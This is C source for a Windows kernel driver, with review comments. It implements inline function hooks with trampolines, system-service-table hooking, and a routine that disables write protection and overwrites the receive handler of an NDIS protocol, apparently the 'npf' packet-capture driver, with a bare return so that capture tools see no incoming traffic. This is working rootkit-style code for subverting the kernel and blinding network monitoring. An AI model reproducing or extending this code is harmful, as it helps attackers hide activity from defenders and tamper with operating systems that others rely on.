NTSTATUS	UndoPatchwsWin7()
{
	/*
	 * Undo the NDIS 6 patch applied by doPatchwsWin7(): write the first four
	 * bytes of a hot-patchable prologue back over the receive handler:
	 *   8b ff   mov edi,edi
	 *   55      push ebp
	 *   8b ec   mov ebp,esp   (only its first byte, 8b, is rewritten)
	 * As a little-endian DWORD those bytes are 0x8b55ff8b.
	 *
	 * NOTE(review): the original bytes are not saved at patch time, so this
	 * assumes the handler really began with that prologue -- confirm, or
	 * save the DWORD before patching and write that back instead.
	 * NOTE(review): only the NDIS 6 handler (g_ReceiveNetBufferListsHandler)
	 * is restored here; the NDIS 5 handlers patched by doPatchwsWin7() are
	 * left patched even though the flag is cleared below.
	 *
	 * Returns STATUS_SUCCESS whether or not anything was written.
	 */
	const ULONG	ulPrologue = 0x8b55ff8b;

	if (g_bAlreadyPatchWS == FALSE)
	{
		kprintf("have not patched ws yet\n");
		return STATUS_SUCCESS;
	}

	if (g_ReceiveNetBufferListsHandler != 0)
	{
		/* Keep the write-protect-off window to the single 4-byte store. */
		WPOFF();
		*(PULONG)g_ReceiveNetBufferListsHandler = ulPrologue;
		WPON();
	}

	g_bAlreadyPatchWS = FALSE;
	return STATUS_SUCCESS;
}
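VOID InstallHook (
		PHOOK_INFO pHookInfo
		)
{
		/*
		 * Redirect pHookInfo->pOrigFunction to pHookInfo->pHookFunction with an
		 * inline jump, after copying the instructions the jump overwrites into
		 * a freshly allocated trampoline that ends with a jump back to the
		 * first untouched instruction.  On success pHookInfo->ulReplaceLen and
		 * pHookInfo->pTramFunction are filled in; on failure both are left as
		 * they were (callers/UnInstallHook should check pTramFunction).
		 *
		 * Fixes over the earlier version:
		 *  - a value was returned from a VOID function;
		 *  - ExAllocatePool() was never checked for NULL before being written;
		 *  - write protection was dropped before the allocation instead of
		 *    only around the store into the target function;
		 *  - the replaced length was never checked against the jump size or
		 *    the trampoline size, so a short CalcReplaceSize() result would
		 *    have clobbered instructions that were never relocated.
		 *
		 * NOTE(review): the patch of the target is not atomic; another CPU
		 * executing the function while the bytes are half written will run
		 * garbage.  A quiescence scheme is needed for SMP-safe use.
		 */
		ULONG_PTR ulTrampoline = 0;
		unsigned char *pTrampoline = NULL;
		ULONG ulReplaceLen = 0;
#ifdef _WIN64
		JMP_ABS JmpABS;
		const ULONG ulJmpLen = (ULONG)sizeof(JMP_ABS);
#else
		JMP_REL JmpREL;
		const ULONG ulJmpLen = (ULONG)sizeof(JMP_REL);
#endif//_WIN64

		if (NULL == pHookInfo ||
				0 == pHookInfo->pOrigFunction ||
				0 == pHookInfo->pHookFunction) {
				return;
		}

		//
		// Ask the disassembler how many whole instructions must be moved so
		// the jump does not split an instruction.
		//
		ulReplaceLen = CalcReplaceSize (pHookInfo->pOrigFunction);
		if (ulReplaceLen < ulJmpLen || ulReplaceLen + ulJmpLen > TrampolineLen) {
				// Too short to hold the jump, or too long for the trampoline.
				return;
		}

		//
		// Build the trampoline first, with write protection still on: the
		// saved bytes, NOP padding, then a jump to the instruction after them.
		//
		pTrampoline = (unsigned char *)ExAllocatePool(NonPagedPool,TrampolineLen);
		if (NULL == pTrampoline) {
				return;
		}
		RtlFillMemory(pTrampoline, TrampolineLen, 0x90);
		ulTrampoline = (ULONG_PTR)pTrampoline;

		memcpy((PCHAR)(ulTrampoline), (PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen);
#ifdef _WIN64
		JmpABS = MakeAbstractJump (pHookInfo->pOrigFunction + ulReplaceLen);
		memcpy(((PCHAR)ulTrampoline + ulReplaceLen), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
		// NOTE(review): the jump is placed at ulTrampoline + ulReplaceLen but is
		// computed from ulTrampoline to pOrigFunction -- confirm MakeRelativeJump
		// accounts for that, otherwise the return jump lands short of the
		// first unpatched instruction.
		JmpREL = MakeRelativeJump (ulTrampoline, pHookInfo->pOrigFunction);
		memcpy((PCHAR)(ulTrampoline + ulReplaceLen), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64

		//
		// Patch the original function: NOP the replaced bytes, then drop the
		// jump to the hook at its entry.  Write protection is off only here.
		//
		WPOFF();
		RtlFillMemory((PCHAR)(pHookInfo->pOrigFunction), ulReplaceLen, 0x90);
#ifdef _WIN64
		JmpABS = MakeAbstractJump (pHookInfo->pHookFunction);
		memcpy((PCHAR)(pHookInfo->pOrigFunction), (PVOID)(&JmpABS), sizeof(JMP_ABS));
#else
		JmpREL = MakeRelativeJump (pHookInfo->pOrigFunction, pHookInfo->pHookFunction);
		memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(&JmpREL), sizeof(JMP_REL));
#endif//_WIN64
		WPON();

		pHookInfo->ulReplaceLen = ulReplaceLen;
		pHookInfo->pTramFunction = (ULONG_PTR)pTrampoline;
}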
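VOID UnInstallHook (
		PHOOK_INFO pHookInfo
		)
{
	/*
	 * Copy the bytes saved in the trampoline back over the entry of the
	 * hooked function, undoing InstallHook().
	 *
	 * Fix: InstallHook() leaves pTramFunction/ulReplaceLen untouched when it
	 * fails (bad arguments, pool allocation failure), so the earlier blind
	 * memcpy could read from address 0; refuse to touch the target unless
	 * both fields are set.
	 *
	 * NOTE(review): the trampoline is deliberately not freed here -- a thread
	 * may still be executing inside it, and freeing it safely needs a
	 * quiescence scheme this code does not have.  The pool block is leaked.
	 * NOTE(review): the restore is not atomic with respect to other CPUs
	 * running the target function.
	 */
	if (!pHookInfo ||
			0 == pHookInfo->pTramFunction ||
			0 == pHookInfo->ulReplaceLen) {
		return;
	}

	WPOFF();
	memcpy((PCHAR)(pHookInfo->pOrigFunction), (PCHAR)(pHookInfo->pTramFunction), pHookInfo->ulReplaceLen);
	WPON();
}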
// Restore the original SSDT entry for OldService, undoing Hook().
//
// OldService is the service identifier understood by SERVICE_ID() and
// SERVICE_FUNCTION(); the original dispatch address is read back from
// OldServiceAddressTable, which the initialisation that sets g_Init must
// have filled in.  Returns STATUS_UNSUCCESSFUL when that initialisation has
// not run, STATUS_SUCCESS otherwise.
//
// NOTE(review): SERVICE_ID() is not range-checked against the table size
// here -- confirm callers only pass valid service numbers.
NTSTATUS UnHook(ULONG OldService)
{
    if(g_Init)
    {
        // Write protection is dropped only around the single table store.
        WPOFF();
        *(PULONG)SERVICE_FUNCTION(OldService) = OldServiceAddressTable[SERVICE_ID(OldService)];
        WPON();

        return STATUS_SUCCESS;
    }

    return STATUS_UNSUCCESSFUL;
}
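// Point the SSDT entry for OldService at NewService.
//
// OldService is the service identifier understood by SERVICE_FUNCTION();
// NewService is the address of the replacement dispatch routine.  The
// original address is not saved here -- UnHook() restores it from
// OldServiceAddressTable, which the initialisation guarded by g_Init must
// have filled in.
//
// Returns STATUS_UNSUCCESSFUL when the table has not been initialised or
// when NewService is 0 (the earlier version wrote a zero dispatch address
// straight into the table), STATUS_SUCCESS otherwise.
NTSTATUS Hook(ULONG OldService, ULONG NewService)
{
    if(!g_Init)
    {
        DbgPrint(("ServiceTalbe Not Init.\n"));
        return STATUS_UNSUCCESSFUL;
    }

    // Fix: never install a null dispatch address.
    if(0 == NewService)
    {
        return STATUS_UNSUCCESSFUL;
    }

    // Write protection is dropped only around the single table store.
    WPOFF();

    DbgPrint("NewService");
    *(PULONG)SERVICE_FUNCTION(OldService) = NewService;

    WPON();
    return STATUS_SUCCESS;
}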
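NTSTATUS	doPatchwsWin7(char *ProName, DWORD dwLen)
{
	/*
	 * Neuter the receive path of the NDIS protocol named by ProName (dwLen
	 * bytes, as understood by GetTargetProtocolBlockWin7) by overwriting the
	 * first bytes of its receive handler with a bare stdcall return, so the
	 * protocol never sees incoming frames.
	 *
	 *  NDIS <= 5: the ReceivePacket handler if present, else the Receive
	 *             handler, gets 0xcc001cc2 = "c2 1c 00  ret 0x1c ; cc  int3".
	 *  NDIS 6:    the ReceiveNetBufferLists handler gets
	 *             0x900014c2 = "c2 14 00  ret 0x14 ; 90  nop".
	 *
	 * Returns STATUS_SUCCESS when a handler was patched or the patch was
	 * already in place, STATUS_UNSUCCESSFUL when the protocol block or its
	 * handler could not be found.  Major versions above 6 are left alone and
	 * reported as success.
	 *
	 * Fix: the NDIS 6 path never set g_bAlreadyPatchWS, so UndoPatchwsWin7()
	 * refused to restore the handler this function had patched; the flag is
	 * now set on both paths.
	 *
	 * NOTE(review): the original bytes are not saved before patching.
	 * UndoPatchwsWin7() writes back a hard-coded hot-patch prologue, and only
	 * for the NDIS 6 handler; the NDIS 5 patches cannot be undone by it.
	 * NOTE(review): "ret 0x1c" pops seven 4-byte arguments.  Confirm that
	 * both NDIS 5 handlers patched with it really take seven arguments;
	 * otherwise the caller's stack is left unbalanced.
	 * NOTE(review): each 4-byte store is done under WPOFF()/WPON() but is not
	 * synchronised with other CPUs that may be executing the handler.
	 */
	const ULONG	uPatchRet3	= 0xcc001cc2;	/* ret 0x1c ; int3 */
	const ULONG	uPatchRet5	= 0x900014c2;	/* ret 0x14 ; nop  */
	DWORD		dwBlock		= 0;
	ULONG		uHandler	= 0;

	if (g_bAlreadyPatchWS)
	{
		return STATUS_SUCCESS;
	}

	g_pNpfProtocolBlockWin7	=	(PNDIS_PROTOCOL_BLOCKWin7)GetTargetProtocolBlockWin7(ProName, dwLen);
	if (g_pNpfProtocolBlockWin7 == NULL)
	{
		return STATUS_UNSUCCESSFUL;
	}

	dwBlock = (DWORD)g_pNpfProtocolBlockWin7;
	g_PatchwsVersion = g_pNpfProtocolBlockWin7->MajorNdisVersion;

	if (g_PatchwsVersion <= 5)
	{
		/* Handler pointers sit at fixed offsets inside the protocol block. */
		g_NPFReceiveHandler			=	(ULONG)*(PDWORD)(dwBlock + g_ReceiveHandlerOffset);
		g_NPFReceivePacketHandler	=	(ULONG)*(PDWORD)(dwBlock + g_ReceivePacketHandlerOffset);

		/* Prefer the packet handler; fall back to the lookahead handler. */
		uHandler = g_NPFReceivePacketHandler ? g_NPFReceivePacketHandler
		                                     : g_NPFReceiveHandler;
		if (uHandler == 0)
		{
			kprintf("what???  there is no receive handler for npf??\n");
			return STATUS_UNSUCCESSFUL;
		}

		WPOFF();
		*(PULONG)uHandler = uPatchRet3;
		WPON();

		g_bAlreadyPatchWS = TRUE;
		return STATUS_SUCCESS;
	}

	if (g_PatchwsVersion == 6)
	{
		g_ReceiveNetBufferListsHandler = *(PDWORD)(dwBlock + g_ReceiveNetBufferListsHandlerOffset);
		if (g_ReceiveNetBufferListsHandler == 0)
		{
			return STATUS_UNSUCCESSFUL;
		}

		WPOFF();
		*(PULONG)g_ReceiveNetBufferListsHandler = uPatchRet5;
		WPON();

		/* Was missing before: UndoPatchwsWin7() keys its restore on this. */
		g_bAlreadyPatchWS = TRUE;
		return STATUS_SUCCESS;
	}

	/* NDIS major version above 6: nothing is patched. */
	return STATUS_SUCCESS;
}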